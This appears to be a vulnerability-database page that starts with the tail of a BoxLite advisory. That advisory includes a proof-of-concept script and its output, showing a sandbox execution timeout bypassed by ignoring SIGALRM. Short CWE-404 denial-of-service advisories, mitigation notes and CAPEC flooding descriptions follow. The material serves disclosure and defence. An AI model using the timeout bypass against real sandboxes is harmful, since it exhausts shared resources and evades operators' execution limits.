r2[\"elapsed\"] \u003e 5.0 and r2[\"exit_code\"] == 0\n \n print()\n if control_killed_by_sigalrm:\n print(\" [+] Control process killed by signal 14 (SIGALRM), not signal 9 (SIGKILL)\")\n print(\" \u2192 confirms timeout watcher sends SIGALRM instead of SIGKILL\")\n if exploit_survived:\n print(f\" [+] Exploit process ran {r2[\u0027elapsed\u0027]:.1f}s past {TIMEOUT_S}s timeout, exited normally\")\n print(\" \u2192 SIGALRM was absorbed by SIG_IGN, timeout completely bypassed\")\n \n if exploit_survived and control_killed_by_sigalrm:\n print()\n print(\" *** VULNERABILITY CONFIRMED ***\")\n print(f\" Fix: change Signal::SIGALRM \u2192 Signal::SIGKILL in\")\n print(f\" guest/src/service/exec/timeout.rs\")\n elif not exploit_survived:\n print(\" NOT CONFIRMED: exploit process was also terminated at timeout\")\n else:\n print(\" INCONCLUSIVE\")\n \n \n if __name__ == \"__main__\":\n asyncio.run(main())\n \n ```\n\n Sample output:\n\n ```\n $ python3 poc_sigalrm_bypass.py\n BoxLite PoC: Execution Timeout Bypass via SIGALRM\n ======================================================================\n Box started: W0oCKYIWga2t\n SIGALRM value inside container: 14\n \n ======================================================================\n TEST: CONTROL: Normal process + 3s timeout (default SIGALRM=terminate)\n timeout=3.0s\n ======================================================================\n [RESULT] exit_code=-14, elapsed=3.01s\n [OUTPUT]\n PID 3: normal process (default SIGALRM), running for 8s\n PID 3: t+1s alive\n PID 3: t+2s alive\n \n ======================================================================\n TEST: EXPLOIT: SIGALRM=SIG_IGN + 3s timeout (BYPASS)\n timeout=3.0s\n ======================================================================\n [RESULT] exit_code=0, elapsed=8.14s\n [OUTPUT]\n PID 4: SIGALRM=SIG_IGN, running for 8s\n PID 4: t+1s alive\n PID 4: t+2s alive\n PID 4: t+3s alive\n PID 4: t+4s STILL ALIVE (PAST 3s TIMEOUT!)\n PID 4: t+5s STILL ALIVE (PAST 3s TIMEOUT!)\n PID 4: t+6s STILL ALIVE (PAST 3s TIMEOUT!)\n PID 4: t+7s STILL ALIVE (PAST 3s TIMEOUT!)\n PID 4: t+8s STILL ALIVE (PAST 3s TIMEOUT!)\n PID 4: WORKLOAD COMPLETE - TIMEOUT WAS BYPASSED\n \n ======================================================================\n TEST: BASELINE: Normal process, no timeout (sanity check)\n timeout=None (disabled)\n ======================================================================\n [RESULT] exit_code=0, elapsed=8.09s\n [OUTPUT]\n PID 5: normal process (default SIGALRM), running for 8s\n PID 5: t+1s alive\n PID 5: t+2s alive\n PID 5: t+3s alive\n PID 5: t+4s alive\n PID 5: t+5s alive\n PID 5: t+6s alive\n PID 5: t+7s alive\n PID 5: t+8s alive\n PID 5: finished\n \n ======================================================================\n VERDICT\n ======================================================================\n CONTROL: elapsed=3.01s exit_code=-14 timed_out=False\n EXPLOIT: elapsed=8.14s exit_code=0 timed_out=False\n BASELINE: elapsed=8.09s exit_code=0 timed_out=False\n \n [+] Control process killed by signal 14 (SIGALRM), not signal 9 (SIGKILL)\n \u2192 confirms timeout watcher sends SIGALRM instead of SIGKILL\n [+] Exploit process ran 8.1s past 3.0s timeout, exited normally\n \u2192 SIGALRM was absorbed by SIG_IGN, timeout completely bypassed\n \n *** VULNERABILITY CONFIRMED ***\n Fix: change Signal::SIGALRM \u2192 Signal::SIGKILL in\n guest/src/service/exec/timeout.rs\n ```\n\n As shown in the output, after catching the SIGALRM signal, the process can continue running, bypassing the timeout restriction.\n\n\n\n#### Impact\n\nMalicious code running inside the sandbox can exploit this vulnerability to continue running after the timeout is triggered, leading to resource exhaustion within the virtual machine and affecting the availability of the BoxLite service.\n\n\n\n#### Score\n\nSeverity: Medium, Score: 6.5, rationale as follows:\n\n- AV:N \u2014 Can be triggered by submitting code via the network API\n- AC:L \u2014 No complex exploitation required; catching the signal is sufficient to bypass\n- PR:L \u2014 The attacker does not need special privileges\n- UI:N \u2014 The attacker does not need to interact with the victim\n- S:U \u2014 This vulnerability only affects the sandbox internals and does not change the scope\n- C:N/I:N/A:H \u2014 This vulnerability only affects availability, not confidentiality or integrity\n\n\n\n#### Credit\n\nThis vulnerability was discovered by:\n\n- XlabAI Team of Tencent Xuanwu Lab\n- Atuin Automated Vulnerability Discovery Engine\n\nCVE and credit are preferred.\n\nIf there are any questions regarding the vulnerability details, please feel free to reach out to Tencent Xuanwu Lab for further discussion by emailing xlabai@tencent.com.\n\n\n\n#### Note\n\nNote that the organization follows the industry-standard **90+30 disclosure policy** (Reference: https://googleprojectzero.blogspot.com/p/vulnerability-disclosure-policy.html). This means that the organization reserves the right to disclose the details of the vulnerability 30 days after the fix has been implemented.",
"id": "GHSA-xjhv-pp2r-6f82",
"modified": "2026-06-11T14:07:10Z",
"published": "2026-05-29T21:45:55Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/boxlite-ai/boxlite/security/advisories/GHSA-xjhv-pp2r-6f82"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-47213"
},
{
"type": "WEB",
"url": "https://github.com/boxlite-ai/boxlite/commit/28159fc5b6b6fd5037e18a58fc4644c882e3c581"
},
{
"type": "PACKAGE",
"url": "https://github.com/boxlite-ai/boxlite"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "BoxLite has a Timeout Bypass Vulnerability"
}
GHSA-XJX2-5QHC-HPW9
Vulnerability from github – Published: 2025-11-23 21:30 – Updated: 2025-11-23 21:30A security flaw has been discovered in SourceCodester Pre-School Management System 1.0. Impacted is the function removefile of the file app/controllers/FilehelperController.php. Performing manipulation of the argument filepath results in denial of service. The attack is possible to be carried out remotely. The exploit has been released to the public and may be exploited.
{
"affected": [],
"aliases": [
"CVE-2025-13564"
],
"database_specific": {
"cwe_ids": [
"CWE-404"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-11-23T19:15:46Z",
"severity": "MODERATE"
},
"details": "A security flaw has been discovered in SourceCodester Pre-School Management System 1.0. Impacted is the function removefile of the file app/controllers/FilehelperController.php. Performing manipulation of the argument filepath results in denial of service. The attack is possible to be carried out remotely. The exploit has been released to the public and may be exploited.",
"id": "GHSA-xjx2-5qhc-hpw9",
"modified": "2025-11-23T21:30:32Z",
"published": "2025-11-23T21:30:32Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13564"
},
{
"type": "WEB",
"url": "https://github.com/0xffaaa/cve/blob/main/Pre_School_Management_System_Arbitrary_File_Deletion_Vulnerabilit.md"
},
{
"type": "WEB",
"url": "https://vuldb.com/?ctiid.333328"
},
{
"type": "WEB",
"url": "https://vuldb.com/?id.333328"
},
{
"type": "WEB",
"url": "https://vuldb.com/?submit.697083"
},
{
"type": "WEB",
"url": "https://www.sourcecodester.com"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-XM3C-W6GM-7Q8V
Vulnerability from github – Published: 2022-05-13 01:04 – Updated: 2022-05-13 01:04An issue was discovered in EMC RSA BSAFE Crypto-J versions prior to 6.2.2. There is an Improper OCSP Validation Vulnerability. OCSP responses have two time values: thisUpdate and nextUpdate. These specify a validity period; however, both values are optional. Crypto-J treats the lack of a nextUpdate as indicating that the OCSP response is valid indefinitely instead of restricting its validity for a brief period surrounding the thisUpdate time. This vulnerability is similar to the issue described in CVE-2015-4748.
{
"affected": [],
"aliases": [
"CVE-2016-8212"
],
"database_specific": {
"cwe_ids": [
"CWE-404"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2017-02-03T07:59:00Z",
"severity": "HIGH"
},
"details": "An issue was discovered in EMC RSA BSAFE Crypto-J versions prior to 6.2.2. There is an Improper OCSP Validation Vulnerability. OCSP responses have two time values: thisUpdate and nextUpdate. These specify a validity period; however, both values are optional. Crypto-J treats the lack of a nextUpdate as indicating that the OCSP response is valid indefinitely instead of restricting its validity for a brief period surrounding the thisUpdate time. This vulnerability is similar to the issue described in CVE-2015-4748.",
"id": "GHSA-xm3c-w6gm-7q8v",
"modified": "2022-05-13T01:04:38Z",
"published": "2022-05-13T01:04:38Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2016-8212"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/archive/1/540066/30/0/threaded"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/95831"
},
{
"type": "WEB",
"url": "http://www.securitytracker.com/id/1037732"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-XM8G-256C-HJQJ
Vulnerability from github – Published: 2026-05-10 03:33 – Updated: 2026-05-10 03:33A vulnerability has been found in Open5GS up to 2.7.7. Affected is the function pcf_nbsf_management_handle_register of the file src/pcf/nbsf-handler.c of the component sm-policies Endpoint. Such manipulation leads to denial of service. The attack may be performed from remote. The exploit has been disclosed to the public and may be used. The project was informed of the problem early through an issue report but has not responded yet.
{
"affected": [],
"aliases": [
"CVE-2026-8222"
],
"database_specific": {
"cwe_ids": [
"CWE-404"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-05-10T03:16:08Z",
"severity": "MODERATE"
},
"details": "A vulnerability has been found in Open5GS up to 2.7.7. Affected is the function pcf_nbsf_management_handle_register of the file src/pcf/nbsf-handler.c of the component sm-policies Endpoint. Such manipulation leads to denial of service. The attack may be performed from remote. The exploit has been disclosed to the public and may be used. The project was informed of the problem early through an issue report but has not responded yet.",
"id": "GHSA-xm8g-256c-hjqj",
"modified": "2026-05-10T03:33:00Z",
"published": "2026-05-10T03:33:00Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-8222"
},
{
"type": "WEB",
"url": "https://github.com/open5gs/open5gs/issues/4437"
},
{
"type": "WEB",
"url": "https://github.com/open5gs/open5gs"
},
{
"type": "WEB",
"url": "https://vuldb.com/submit/808427"
},
{
"type": "WEB",
"url": "https://vuldb.com/vuln/362439"
},
{
"type": "WEB",
"url": "https://vuldb.com/vuln/362439/cti"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-XP28-3FV9-33C6
Vulnerability from github – Published: 2024-03-19 06:30 – Updated: 2025-11-04 18:30A vulnerability in Node.js has been identified, allowing for a Denial of Service (DoS) attack through resource exhaustion when using the fetch() function to retrieve content from an untrusted URL. The vulnerability stems from the fact that the fetch() function in Node.js always decodes Brotli, making it possible for an attacker to cause resource exhaustion when fetching content from an untrusted URL. An attacker controlling the URL passed into fetch() can exploit this vulnerability to exhaust memory, potentially leading to process termination, depending on the system configuration.
{
"affected": [],
"aliases": [
"CVE-2024-22025"
],
"database_specific": {
"cwe_ids": [
"CWE-404"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-03-19T05:15:10Z",
"severity": "MODERATE"
},
"details": "A vulnerability in Node.js has been identified, allowing for a Denial of Service (DoS) attack through resource exhaustion when using the fetch() function to retrieve content from an untrusted URL.\nThe vulnerability stems from the fact that the fetch() function in Node.js always decodes Brotli, making it possible for an attacker to cause resource exhaustion when fetching content from an untrusted URL.\nAn attacker controlling the URL passed into fetch() can exploit this vulnerability to exhaust memory, potentially leading to process termination, depending on the system configuration.",
"id": "GHSA-xp28-3fv9-33c6",
"modified": "2025-11-04T18:30:46Z",
"published": "2024-03-19T06:30:53Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22025"
},
{
"type": "WEB",
"url": "https://hackerone.com/reports/2284065"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2024/03/msg00029.html"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2024/09/msg00029.html"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20240517-0008"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-XPMJ-434V-J6XG
Vulnerability from github – Published: 2024-02-29 03:33 – Updated: 2024-02-29 03:33A vulnerability was found in Hyper CdCatalog 2.3.1. It has been classified as problematic. This affects an unknown part of the component HCF File Handler. The manipulation leads to denial of service. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. The identifier VDB-252681 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
{
"affected": [],
"aliases": [
"CVE-2024-1191"
],
"database_specific": {
"cwe_ids": [
"CWE-404"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-02-29T01:43:42Z",
"severity": "LOW"
},
"details": "A vulnerability was found in Hyper CdCatalog 2.3.1. It has been classified as problematic. This affects an unknown part of the component HCF File Handler. The manipulation leads to denial of service. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. The identifier VDB-252681 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.",
"id": "GHSA-xpmj-434v-j6xg",
"modified": "2024-02-29T03:33:16Z",
"published": "2024-02-29T03:33:16Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1191"
},
{
"type": "WEB",
"url": "https://fitoxs.com/vuldb/19-exploit-perl.txt"
},
{
"type": "WEB",
"url": "https://vuldb.com/?ctiid.252681"
},
{
"type": "WEB",
"url": "https://vuldb.com/?id.252681"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"type": "CVSS_V3"
}
]
}
Mitigation MIT-3
Strategy: Language Selection
- Use a language that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.
- For example, languages such as Java, Ruby, and Lisp perform automatic garbage collection that releases memory for objects that have been deallocated.
Mitigation
It is good practice to be responsible for freeing all resources you allocate and to be consistent with how and where you free memory in a function. If you allocate memory that you intend to free upon completion of the function, you must be sure to free the memory at all exit points for that function including error conditions.
Mitigation
Memory should be allocated/freed using matching functions such as malloc/free, new/delete, and new[]/delete[].
Mitigation
When releasing a complex object or structure, ensure that you properly dispose of all of its member components, not just the object itself.
CAPEC-125: Flooding
An adversary consumes the resources of a target by rapidly engaging in a large number of interactions with the target. This type of attack generally exposes a weakness in rate limiting or flow. When successful this attack prevents legitimate users from accessing the service and can cause the target to crash. This attack differs from resource depletion through leaks or allocations in that the latter attacks do not rely on the volume of requests made to the target but instead focus on manipulation of the target's operations. The key factor in a flooding attack is the number of requests the adversary can make in a given period of time. The greater this number, the more likely an attack is to succeed against a given target.
CAPEC-130: Excessive Allocation
An adversary causes the target to allocate excessive resources to servicing the attackers' request, thereby reducing the resources available for legitimate services and degrading or denying services. Usually, this attack focuses on memory allocation, but any finite resource on the target could be the attacked, including bandwidth, processing cycles, or other resources. This attack does not attempt to force this allocation through a large number of requests (that would be Resource Depletion through Flooding) but instead uses one or a small number of requests that are carefully formatted to force the target to allocate excessive resources to service this request(s). Often this attack takes advantage of a bug in the target to cause the target to allocate resources vastly beyond what would be needed for a normal request.
CAPEC-131: Resource Leak Exposure
An adversary utilizes a resource leak on the target to deplete the quantity of the resource available to service legitimate requests.
CAPEC-494: TCP Fragmentation
An adversary may execute a TCP Fragmentation attack against a target with the intention of avoiding filtering rules of network controls, by attempting to fragment the TCP packet such that the headers flag field is pushed into the second fragment which typically is not filtered.
CAPEC-495: UDP Fragmentation
An attacker may execute a UDP Fragmentation attack against a target server in an attempt to consume resources such as bandwidth and CPU. IP fragmentation occurs when an IP datagram is larger than the MTU of the route the datagram has to traverse. Typically the attacker will use large UDP packets over 1500 bytes of data which forces fragmentation as ethernet MTU is 1500 bytes. This attack is a variation on a typical UDP flood but it enables more network bandwidth to be consumed with fewer packets. Additionally it has the potential to consume server CPU resources and fill memory buffers associated with the processing and reassembling of fragmented packets.
CAPEC-496: ICMP Fragmentation
An attacker may execute a ICMP Fragmentation attack against a target with the intention of consuming resources or causing a crash. The attacker crafts a large number of identical fragmented IP packets containing a portion of a fragmented ICMP message. The attacker these sends these messages to a target host which causes the host to become non-responsive. Another vector may be sending a fragmented ICMP message to a target host with incorrect sizes in the header which causes the host to hang.
CAPEC-666: BlueSmacking
An adversary uses Bluetooth flooding to transfer large packets to Bluetooth enabled devices over the L2CAP protocol with the goal of creating a DoS. This attack must be carried out within close proximity to a Bluetooth enabled device.